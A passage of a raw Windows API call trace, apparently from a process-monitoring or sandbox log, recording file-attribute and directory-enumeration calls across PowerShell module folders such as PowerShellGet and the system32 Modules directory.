returned 0xffffffff [0159.522] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\Pester.dll" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\pester\\pester.dll")) returned 0xffffffff [0159.522] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86deae4) returned 1 [0159.522] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3f [0159.522] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x3f, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x3e [0159.522] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\*", lpFindFileData=0x86de80c | out: lpFindFileData=0x86de80c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbc9fecb3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c6f037, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76d3d90 [0159.522] FindNextFileW (in: hFindFile=0x76d3d90, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbc9fecb3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c6f037, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0159.523] FindNextFileW (in: hFindFile=0x76d3d90, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbca000ca, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b27bb25, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0159.523] FindNextFileW (in: hFindFile=0x76d3d90, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0159.523] FindClose (in: hFindFile=0x76d3d90 | out: hFindFile=0x76d3d90) returned 1 [0159.523] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86deaa0) returned 1 [0159.523] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86deaac) returned 1 [0159.523] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5a [0159.523] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x5a, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x59 [0159.523] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea78) returned 1 [0159.523] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0x86deaf4 | out: lpFileInformation=0x86deaf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a83f191, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5eab1ff, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5eab1ff, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xadf)) returned 1 [0159.525] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea74) returned 1 [0159.525] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5a [0159.525] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x5a, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x59 [0159.525] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5a [0159.525] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x5a, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x59 [0159.525] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea9c) returned 1 [0159.525] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0x539bd08 | out: lpFileInformation=0x539bd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a83f191, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5eab1ff, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5eab1ff, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xadf)) returned 1 [0159.525] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea98) returned 1 [0159.525] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\powershellget.psd1")) returned 0xffffffff [0159.526] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psm1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\powershellget.psm1")) returned 0xffffffff [0159.526] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.cdxml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\powershellget.cdxml")) returned 0xffffffff [0159.526] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.xaml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\powershellget.xaml")) returned 0xffffffff [0159.526] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.ni.dll" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\powershellget.ni.dll")) returned 0xffffffff [0159.526] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.dll" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\powershellget.dll")) returned 0xffffffff [0159.583] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules")) returned 0x10 [0159.584] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86deae4) returned 1 [0159.584] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x33 [0159.584] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x33, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0159.584] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\*", lpFindFileData=0x86de80c | out: lpFindFileData=0x86de80c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x55ba8b37, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x55ba8b37, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76d4290 [0159.585] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x55ba8b37, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x55ba8b37, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0159.586] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xe6e35c2e, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x1902eb1, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0xe9611c78, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker", cAlternateFileName="APPLOC~1")) returned 1 [0159.586] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xe6e35c2e, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x197a24f, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x76586f17, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppvClient", cAlternateFileName="APPVCL~1")) returned 1 [0159.586] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x197bc54, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x206e0505, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx", cAlternateFileName="")) returned 1 [0159.586] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x197c4d1, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x206e0505, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer", cAlternateFileName="BITSTR~1")) returned 1 [0159.586] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xe6e5be8c, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x197cd93, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0xe966970b, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache", cAlternateFileName="BRANCH~1")) returned 1 [0159.586] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x197d5fb, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x206e0505, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets", cAlternateFileName="CIMCMD~1")) returned 1 [0159.587] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x19ea3b1, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x20706767, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DirectAccessClientComponents", cAlternateFileName="DIRECT~1")) returned 1 [0159.587] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x19eb58e, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x8cfff4c6, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism", cAlternateFileName="")) returned 1 [0159.587] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x19ec84e, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x20706767, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClient", cAlternateFileName="DNSCLI~1")) returned 1 [0159.587] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1a636cb, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2072c9cd, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EventTracingManagement", cAlternateFileName="EVENTT~1")) returned 1 [0159.588] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1a63ff3, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2072c9cd, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="International", cAlternateFileName="INTERN~1")) returned 1 [0159.588] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1a648ba, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2072c9cd, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSI", cAlternateFileName="")) returned 1 [0159.588] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1a65091, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2072c9cd, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ISE", cAlternateFileName="")) returned 1 [0159.588] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1a65832, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2072c9cd, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kds", cAlternateFileName="")) returned 1 [0159.588] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1a6609c, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x8d025724, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive", cAlternateFileName="MICROS~1.ARC")) returned 1 [0159.588] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1a67503, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2072c9cd, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics", cAlternateFileName="MICROS~1.DIA")) returned 1 [0159.588] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1a67e99, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2072c9cd, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host", cAlternateFileName="MICROS~1.HOS")) returned 1 [0159.589] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1a686f1, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2072c9cd, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management", cAlternateFileName="MICROS~1.MAN")) returned 1 [0159.589] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1ac9e27, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x8d025724, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils", cAlternateFileName="MICROS~1.ODA")) returned 1 [0159.589] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1acae81, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x20752c33, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Security", cAlternateFileName="MICROS~1.SEC")) returned 1 [0159.589] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1acb52e, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x20752c33, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility", cAlternateFileName="MICROS~1.UTI")) returned 1 [0159.589] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1acc005, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x20752c33, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.WSMan.Management", cAlternateFileName="MICROS~2.MAN")) returned 1 [0159.590] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1acdc29, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x8d025724, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc", cAlternateFileName="")) returned 1 [0159.590] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20c0ce20, ftCreationTime.dwHighDateTime=0x1d32773, ftLastAccessTime.dwLowDateTime=0x243555cf, ftLastAccessTime.dwHighDateTime=0x1d32773, ftLastWriteTime.dwLowDateTime=0x243555cf, ftLastWriteTime.dwHighDateTime=0x1d32773, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSMQ", cAlternateFileName="")) returned 1 [0159.590] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1acff90, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2079f100, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetAdapter", cAlternateFileName="NETADA~1")) returned 1 [0159.590] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1bb671a, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2079f100, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetConnection", cAlternateFileName="NETCON~1")) returned 1 [0159.590] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1bb70fa, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x207c536a, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetEventPacketCapture", cAlternateFileName="NETEVE~1")) returned 1 [0159.590] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1c2fdb4, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x207c536a, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetLbfo", cAlternateFileName="")) returned 1 [0159.591] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1c7d5c2, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x207eb5c8, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetNat", cAlternateFileName="")) returned 1 